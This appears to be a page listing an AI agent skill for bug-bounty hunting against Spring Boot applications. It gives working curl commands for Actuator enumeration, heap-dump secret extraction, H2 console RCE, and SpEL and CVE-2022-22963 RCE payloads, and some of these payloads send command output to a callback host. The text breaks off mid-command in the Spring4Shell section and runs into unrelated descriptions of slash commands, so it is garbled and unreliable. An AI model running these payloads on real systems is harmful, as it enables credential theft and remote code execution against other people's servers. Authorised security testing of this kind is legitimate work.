hunt-springboot
**hunt-springboot** identifies critical vulnerabilities in Spring Boot applications by targeting exposed Actuator endpoints like /actuator/heapdump, /actuator/env, and /actuator/shutdown that leak credentials and enable denial of service, plus SpEL injection vectors, H2 console RCE, and known exploits like Spring4Shell and Spring Cloud Function SPEL injection. Use this skill when fingerprinting reveals a Java Spring Boot target via X-Application-Context headers, /actuator paths, Whitelabel error pages, or Java stack traces.
git clone --depth 1 https://github.com/elementalsouls/Claude-BugHunter /tmp/hunt-springboot && cp -r /tmp/hunt-springboot/skills/hunt-springboot ~/.claude/skills/hunt-springbootSKILL.md
# HUNT-SPRINGBOOT — Spring Boot Specific Vulnerabilities
## Crown Jewel Targets
Spring Boot Actuator `/actuator/heapdump` exposed = heap dump with all secrets in memory.
**Highest-value findings:**
- **`/actuator/heapdump`** — full JVM heap dump contains plaintext passwords, tokens, DB credentials, private keys stored anywhere in memory
- **`/actuator/env`** — lists all environment variables and Spring properties including secrets
- **`/actuator/shutdown`** — POST → shuts down the application (Critical availability impact)
- **H2 Console (`/h2-console`)** — in-memory DB admin UI → SQL query execution → potential RCE via `CREATE ALIAS` trick
- **SpEL injection** — Spring Expression Language in template fields, `@Value` annotations, SpEL-processed request params → RCE
- **Spring4Shell CVE-2022-22965** — Spring Framework < 5.3.18 + Tomcat → RCE via data binding
---
## Phase 1 — Fingerprint Spring Boot
```bash
# Spring Boot indicators
curl -sI https://$TARGET/ | grep -i "x-application-context\|x-content-type"
curl -s "https://$TARGET/nonexistent" | grep -i "Whitelabel Error Page\|Spring Boot\|org.springframework"
# Actuator root (may list available endpoints)
curl -s "https://$TARGET/actuator" | python3 -m json.tool 2>/dev/null
curl -s "https://$TARGET/actuator/" | python3 -m json.tool 2>/dev/null
# Try common base paths
for base in "" "/manage" "/management" "/app"; do
STATUS=$(curl -s -o /dev/null -w "%{http_code}" "https://$TARGET$base/actuator")
[ "$STATUS" = "200" ] && echo "[+] Actuator at: $TARGET$base/actuator"
done
```
---
## Phase 2 — Actuator Endpoint Enumeration
```bash
BASE="https://$TARGET/actuator"
# High-impact endpoints
ENDPOINTS=("env" "heapdump" "threaddump" "mappings" "beans" "metrics"
"loggers" "info" "health" "configprops" "shutdown" "trace"
"httptrace" "auditevents" "sessions" "scheduledtasks" "caches"
"flyway" "liquibase" "refresh" "restart")
for EP in "${ENDPOINTS[@]}"; do
# Don't trust HTTP 200 alone — Spring returns 200 with a Whitelabel/login
# page for many paths. Require actuator-shaped JSON (or a heapdump body)
# before calling it EXPOSED.
BODY=$(curl -s -H "Accept: application/json" "$BASE/$EP")
CT=$(curl -s -o /dev/null -w "%{content_type}" -H "Accept: application/json" "$BASE/$EP")
if echo "$CT" | grep -qi "json" && ! echo "$BODY" | grep -qi "Whitelabel Error Page\|<html"; then
echo "[+] EXPOSED: $BASE/$EP"
fi
done
# Get environment variables (passwords, API keys)
curl -s "$BASE/env" | python3 -m json.tool 2>/dev/null | grep -i "password\|secret\|key\|token\|credential" | head -20
# Get all endpoint mappings (full API surface)
curl -s "$BASE/mappings" | python3 -m json.tool 2>/dev/null | grep -oP '"pattern":"\K[^"]+' | sort
# Get Spring beans (lists all registered beans, reveals internal architecture)
curl -s "$BASE/beans" | python3 -m json.tool 2>/dev/null | head -100
```
---
## Phase 3 — Heap Dump Analysis
```bash
# Download heap dump (can be large — 100MB+)
curl -s "$BASE/heapdump" -o /tmp/heapdump.hprof
ls -lh /tmp/heapdump.hprof
# Quick grep for secrets in heap dump (binary file — use strings)
strings /tmp/heapdump.hprof | grep -iE "(password|secret|apikey|api_key|token|bearer|private_key)" | \
grep -v "^[a-z_]" | sort -u | head -50
# More targeted extraction
strings /tmp/heapdump.hprof | grep -oP "(?:password|passwd|pwd)\s*[=:]\s*\S+" | sort -u | head -20
strings /tmp/heapdump.hprof | grep -oP "AKIA[A-Z0-9]{16}" | sort -u # AWS keys
strings /tmp/heapdump.hprof | grep -oP "sk_live_[A-Za-z0-9]+" | sort -u # Stripe keys
strings /tmp/heapdump.hprof | grep -oP "Bearer [A-Za-z0-9._-]+" | sort -u # Bearer tokens
# Use Eclipse Memory Analyzer (MAT) for deep analysis
# https://www.eclipse.org/mat/
```
---
## Phase 4 — H2 Console RCE
```bash
# H2 console detection
curl -s "https://$TARGET/h2-console" | grep -i "H2 Console\|H2 Database"
curl -s "https://$TARGET/h2" | grep -i "H2 Console"
curl -s "https://$TARGET/console" | grep -i "H2"
# Default credentials: sa / (empty password)
# JDBC URL: jdbc:h2:mem:testdb
# If accessible, RCE via CREATE ALIAS:
# SQL to execute:
# CREATE ALIAS EXEC AS $$ String exec(String cmd) throws Exception {
# Runtime rt = Runtime.getRuntime();
# String[] commands = {"sh","-c",cmd};
# Process proc = rt.exec(commands);
# return new String(proc.getInputStream().readAllBytes());
# } $$;
# CALL EXEC('id');
```
---
## Phase 5 — SpEL Injection
```bash
# Spring Expression Language injection in user-controlled fields
# Test: ${7*7} or #{7*7} → if the response reflects 49, SpEL is being evaluated
# Common injection points:
# - Email template fields: "Hello ${name}"
# - Custom annotation @Value("${user.input}")
# - Spring Security expressions
# - Spring WebFlow
# Basic SpEL test
curl -s -X POST "https://$TARGET/api/user/name" \
-H "Content-Type: application/json" \
-d '{"name": "#{7*7}"}'
# If returns 49 → SpEL injection confirmed
# RCE payload — note: exec() returns a Process, not a String, so a bare
# exec("id") produces NO visible output. Confirm via an OOB curl callback
# (the spawned curl makes the network request even though nothing is reflected):
curl -s -X POST "https://$TARGET/api/user/name" \
-H "Content-Type: application/json" \
-d '{"name": "#{T(java.lang.Runtime).getRuntime().exec(new String[]{\"sh\",\"-c\",\"curl COLLAB_HOST/spel-$(id|base64)\"})}"}'
# CVE-2022-22963 — Spring Cloud Function SpEL
curl -s -X POST "https://$TARGET/functionRouter" \
-H "spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(\"curl COLLAB_HOST/spel-rce\")" \
-d "test"
```
---
## Phase 6 — Spring4Shell (CVE-2022-22965)
```bash
# Affects: Spring Framework < 5.3.18 and < 5.2.20 (and all older branches);
# fixed in 5.3.18 / 5.2.20. Requires JDK 9+ and WAR-on-Tomcat deployment.
# Requires: Java 9+, Tomcat as WAR deployment
# Detection: does the app accept class.* parameters?
curl -s "https://$TARGET/api/useRun autonomous hunt loop on a target — scope check → recon → rank surface → hunt → validate → report with configurable checkpoints. Usage: /autopilot target.com [--paranoid|--normal|--yolo]
Build an exploit chain — given bug A, finds B and C to combine for higher severity and payout. Knows common chain patterns: IDOR→ATO, SSRF→cloud metadata, XSS→ATO, open redirect→OAuth theft, S3→bundle→secret→OAuth. Usage: /chain
Active vulnerability hunting. Two-track dispatcher — asks Red Team vs WAPT, hands off to hunt-dispatch skill and sibling commands. Usage: /hunt target.com | /hunt *.target.com | /hunt targets.txt [--vuln-class X] [--source-code P] [--chrome]
On-demand intelligence fetch for a target — CVEs, disclosed reports, new features. Wraps learn.py + hunt memory context. Usage: /intel target.com
Inspect or rotate hunt-memory JSONL files (audit.jsonl, patterns.jsonl, journal.jsonl). Caps file size and keeps N rotated backups so memory does not grow unbounded.
Pick up a previous hunt on a target — shows hunt history, untested endpoints, and memory-informed suggestions. Usage: /pickup target.com
Run full recon pipeline on a target — subdomain enum (Chaos API + subfinder), live host discovery (dnsx + httpx), URL crawl (katana + waybackurls + gau), gf pattern classification, nuclei scan. Outputs to recon/<target>/ directory. Usage: /recon target.com
Log current finding or successful pattern to hunt memory. Auto-fills from /validate output if available. Usage: /remember